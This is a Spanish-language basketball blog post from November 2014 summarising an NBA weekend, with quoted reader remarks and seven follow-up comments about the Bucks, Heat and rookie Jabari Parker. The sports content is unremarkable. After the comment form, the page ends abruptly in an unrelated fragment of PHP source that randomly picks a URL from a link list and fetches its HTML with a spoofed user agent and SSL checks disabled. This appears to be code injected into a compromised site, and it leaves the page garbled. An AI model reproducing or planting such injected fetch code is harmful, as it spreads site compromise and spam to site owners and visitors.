Informe del fin de semana: Grizzlies, Rockets, Warriors y Blazers no aflojan

17 de November de 2014 por TheDeerHunter

Mucho de lo que hablar de estos últimos días. Al tema.

El foco del viernes lo pusisteis sobre dos equipos modestos que con sus respectivas victorias se colocaban 4-6 en la clasificación y que nos dejaban interesantes detalles. Hablamos de Orlando y Utah.

“Otra victoria de Orlando que le da mas aire aún al nefasto Jacque Vaughn.” Denise.

Efectivamente, los Magic de Vaughn lograron una convincente victoria ante unos Bucks que llegaban situados en zona de playoffs. Podremos discutir el papel de veteranos como Channing Frye, Ben Gordon, Luke Ridnour o Willie Green pero al menos este año el equipo parece tener las ideas más claras en ciertos aspectos. Tobias Harris se marcó otro partidazo saliendo de tres y parece haber asimilado esa dualidad SF-PF que tanto le afectó el año pasado. Gran noticia la vuelta de Victor Oladipo con el equipo metido en la pomada. Por contra, flojo partido de los Bucks, de los cuales que podemos rescatar a Brandon Knight, Giannis Antetokounmpo y… John Henson al que por fin Kidd dio algo de “vidilla”.

“Jabari Parker cierra otro altamente gris partido, 6 puntitos en 27 minutos con 2 de 5 en cancha, algo no esta funcionando bien con este chico.” Azabel

Se nos queda un poco cara de tontos ante el “poderío” mostrado por esta rutilante generación de rookies. En cambio uno de los mejores representantes de la hornada anterior fue brillante protagonista de la jornada.

“Vaya buzzer beater de Trey Burke en toda la cara de JR Smith. Sin lugar a dudas los Jazz tienen el mejor núcleo de jovenes de toda la liga, sus dos últimos picks, Trey Burke y Dante Exum con los años creo que serán los mejores jugadores del Draft ’13 y ’14; y encima timaron a los Nuggets consiguiendo a Rudy Gobert a cambio de un tal Erick Green.” Denise.

A pesar de la mínima diferencia en el marcador contrasta el desempeño de estos jóvenes Jazz frente a unos Knicks que parecen que van a volver a ser de lo peorcito esta campaña. Duelísimo de Carmelo Anthony, el mejor de la jornada y honorífico mayor esfuerzo en vano, frente a un explosionado Gordon Hayward. ¡Cómo está el chaval! 

Todas las “ovejas negras” de este principio de curso jugaron y perdieron el viernes. Bueno, todas no porque Denver ganó a Indiana en su mejor partido hasta ahora, mostrando su imagen más colectiva con 7 hombres en dobles figuras y 10 aportando. Ese es el “best case” de los Nuggets. En cambio, los Sixers se ahogaron en la orilla en Houston. Como dijistéis en directo fueron ganando prácticamente todo el partido. La flor que tiene este año Harden y su equipo les dejó con la miel en los labios. Los Pelicans le endosaron un correctivo de 48 puntos a los Wolves, auténticas almas en pena sin Ricky. Con él probablemente tampoco estarían tocando el cielo pero al menos sí daban la cara. Récord de canastas anotadas, porcentaje y margen de victoria para la franquicia del pelícano pardo.

La mala suerte se viene cebando con los Thunder este inicio. Esta vez les tocó palmar en la prórroga ante otros “parias” como Detroit después de haber cuajado otro partido digno. La remontada con Durant y Westbrook se presenta épica. Partidazo de Brandon Jennings, por cierto. En cambio a Kobe Bryant se le hizo de noche ante la defensa marca Popovic en uno de las actuaciones más aciagas y frustrantes de su carrera (9 puntos con un 1 de 14 en TC, 0 de 5 en T3 y 4 pérdidas). Derrota de los Lakers, claro.

Del resto de jornada había lógico interés en seguir las evoluciones de los Cavaliers. Tocó remontada, de nada menos que 19 puntos.

“Tres victorias seguidas de los Cavs, a trompicones y con la mejor versión de LeBron.” Nacho


“El mismo LeBron tiene esas dos caras y es que lo mismo un día raja de los tiramandarinas de su equipo para que esta noche asumiera 27 tiros para aportar 41 puntazos,aunque algunos de esos tiros fueran auténticas castañas.Luego también tuvo algunas acciones negativas en el último cuarto que pudieron cambiar el resultado,como ese segundo tiro libre fallado a pocos segundos del final y una defensa a Olynick bastante floja dejándole tirar de 3,pero al final prevalece lo bueno gracias al resultado,que por cierto también hay que agradecer la genialidad táctica de Stevens & Rondo en la jugada final.”
 Ruxixon

Cerrando lo acontecido el viernes Millsap y Horford fueron demasiado para Miami y los Hornets ganaron en Phoenix.

El sábado, otra maratoniana jornada. En el Este destacaron las victorias de Raptors, Wizards y Cavs. En el plano negativo la extraña derrota de los Bulls ante los mermados Pacers.

“Cleveland sale con Irving-Marion-James-Love-Varejao y, se notan unas deficiencias a la hora de mover el balón impresionantes.” Mamba_blanca

No habría óptimo movimiento de balón pero abrieron la lata con un 9 de 9 en triples en el primer cuarto y los Hawks ya no supieron qué hacer para contenerles. De las victorias de los líderes de la conferencia nos hacía la crónica detallada Denise:

“Pues bien victoria de Wizards (98-93). Exhibición de Wall en los dos primeros cuartos manteniendo a los Wizards arriba siempre en la horquilla de los 5-10 puntos. En el tercer cuarto, los Magic aumentaron su defensa, y liderados por un magnífico Tobias Harris (19-8 y 8/11 en tiros) los titulares de los Magic se han comido a lo de los Wizards. Los capitalinos estaban cada vez más perdidos y parecía que los visitantes podrían dar la sorpresa, pero ha aparecido y de que forma la segunda unidad de los Wizards, con un sensacional Rasual Butler anotando como 8-10 puntos en el último cuarto, bien secundado por Otto Porter (gran candidato al MIP) y por Kris Humphries

“Los Raptors han ganado a los cansados Jazz, afianzándose como mejor equipo del Atlántico, con 27 puntos de Demar DeRozan y 17 de un sorprendente Patrick Patterson. Por los mormones, 8-8 de Rudy Gobert en 18 minutos.”

En el Oeste muchos gallos en liza. Ganaron todos excepto los Spurs que fueron sorprendidos por los correosos Kings. Los campeones están momentáneamente fuera de posiciones de playoffs.

“Vaya exhibiciones que da Chris Paul cuando quiere: 32 puntos,5 rebotes,9 asistencias y 2 robos,comandando la noche de los guards ante Dragic, Thomas y Bledsoe, del cual esperaba mucho más en la que fue su casa durante 3 años.” Ruxixon

CP3 fue el mejor de la jornada del sábado y lideró a los suyos a una convincente victoria ante los Suns. Ojo al partidito de Alex Len como sorpresa.

Los Wolves recibieron su segunda paliza consecutiva esta vez a manos de los Mavericks y Flip Saunders debería empezar a preocuparse por el puesto. Los Hornets también recibieron un severo correctivo, ellos de las manos de unos Warriors que van como motos y que se mantienen en los puestos altos del Oeste, justo por encima de los Blazers (que ganaron a los Nets sin Aldridge ni Batum pero con un Damian Lillard espectacular) y detrás de los Grizzlies, que ganaron a los Pistons y recuperaron el liderato de la liga.

La jornada de domingo comenzó con un esperpéntico Nuggets@Knicks que dejó claro que su mal comienzo no es casualidad. Denver sólo fue capaz de anotar una canasta en juego en todo el segundo cuarto y lo consiguió sobre la bocina. Los menos malos fueron los locales que rompieron su pésima racha de 7 derrotas consecutivas. Melo y JR Smith anotaron 28 puntos cada uno.

“De verdad que son un esperpento estos Nuggets. 8 puntos en el segundo cuarto con un 1/16 en tiros mientras les meten 30 puntos por cuarto. Me da que Shaw no se come los turrones”. Rumbero

Más esperpéntico aún fue el Rockets – Thunder. Ninguno de los 2 equipos fue capaz de superar el 30% de acierto en el tiro y ambos quedaron por debajo de los 70 puntos. De hecho, juntos anotaron menos puntos que los Warriors, que destrozaron a los Lakers con 136 puntos. Stephen Curry se dio un festín ante la prácticamente inexistente defensa amarilla y Kobe, que era duda antes de empezar el partido, se fue a los 44 puntos a pesar de jugar solo 31 minutos. Finalmente, los Heat continúan en caida libre y ya suman 3 derrotas consecutivas, la última ante los Bucks con Brandon Knight mandando y John Henson de nuevo relegado al ostracismo. Entre Chris Bosh y Luol Deng anotaron 5 de sus 28 intentos de canasta. Así, imposible.

Comenta

7 comentarios a esta entrada

  1. rumbero dice:
    #1

    Entran unas ganas locas de verse el Rockets – Thunder…madre mia. Eso si, a lo tonto Houston tiene la mejor defensa de la liga.

      Citar

  2. Azabel dice:
    #2

    rudy gay firma una extension con los Kings por 3 años y 40 millones, algo asi como 13 millones por año, contrato senciblemente menor que el actual y por eso me parece muy bueno

      Citar

  3. Ruxixon dice:
    #3

    Lo lógico y normal hubiese sido que con un partido normal de Bosh,Miami hubiera ganado pero ahí están Bucks y Heat igualados en la tabla.Claroscuros en el equipo de Kidd,falta mucho para que se definan como un equipo a tener en cuenta,algo lógico y normal con la juventud que tienen.Es una pena que a Henson no le den más bola pero Kidd lo ve como un center y Sanders y Pachulia están por delante.Podían probarlo de 4 y apartar a Ilyasova que pinta poco en Milwaukee,como Bayless y Dudley.Y el griego sigue molando pero se empeña en 1vs1 muchas veces sin que la jugada lo pida,le queda un largo recorrido para llegar a lo que todo el mundo espera de él.

      Citar

  4. Azabel dice:
    #4

    Ruxixon:
    Lo lógico y normal hubiese sido que con un partido normal de Bosh,Miami hubiera ganado pero ahí están Bucks y Heat igualados en la tabla.Claroscuros en el equipo de Kidd,falta mucho para que se definan como un equipo a tener en cuenta,algo lógico y normal con la juventud que tienen.Es una pena que a Henson no le den más bola pero Kidd lo ve como un center y Sanders y Pachulia están por delante.Podían probarlo de 4 y apartar a Ilyasova que pinta poco en Milwaukee,como Bayless y Dudley.Y el griego sigue molando pero se empeña en 1vs1 muchas veces sin que la jugada lo pida,le queda un largo recorrido para llegar a lo que todo el mundo espera de él.

    Dudley esta claro que ya no tiene mucho que hacer en los Bucks, pero Bauless ha jugado mucho y muy bien, sin dudas esta siendo un buen base suplente

    me gusta el trabajo de KIDD, ser un equipo tan serie y duro le esta jugando en contra a Parker, que no tiene minutos basura para hacer estadisticas, pero el rnedimiento general es realmente bueno, Giannis parece que sera un crack desp de todo

      Citar

  5. Nacho dice:
    #5

    Al griego le va a venir muy bien tanto Kidd, como Katsikaris en la selección. Son entrenadores que miman y hacen progrresar a sus chicas sin estridencias.
    Esteban, yo creo que Parker preferirá hacer estos números jugando partidos de verdad, que jugar morralla.
    Ilyasova, salvo en la selección, siempre ha dado el callo. Buen tipo para este equipo.
    @Ruxixon. Miami empezó muy bien, pero lleva cortocircuitado tres días. No es solo Bosh el que falla.

      Citar

  6. Azabel dice:
    #6

    Nacho:
    Esteban, yo creo que Parker preferirá hacer estos números jugando partidos de verdad, que jugar morralla.
    .

    Obviamente que es preferible que juege enserio a que los goleen todos los partidos, pero vamos que el año rookie muchas veces es para futras estrellas un año sin preciones y que le dejan tirar a ploacer, probar jugadas hasta ver que es lo que le funciona, equivoicarswe y que a nadie le importe

    en cambio de eso Parker, esta jugando atado, con compañeros que juegan a ganar, midiendo sus tiros y limitando sus minutos

    es bueno para su progreso? habra q ver

      Citar

  7. Ruxixon dice:
    #7

    Nacho:
    @Ruxixon. Miami empezó muy bien, pero lleva cortocircuitado tres días. No es solo Bosh el que falla.

    Bueno,me refería a ese partido en concreto,no sé cómo lo venían haciendo atrás aunque por vuestros comentarios y las crónicas si que señalabais una bajada en las prestaciones.Ante Milwaukee daba la sensación de que a poco que Bosh hubiera estado acertado se le quitaban las ganas a los Bucks de remontar el partido.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>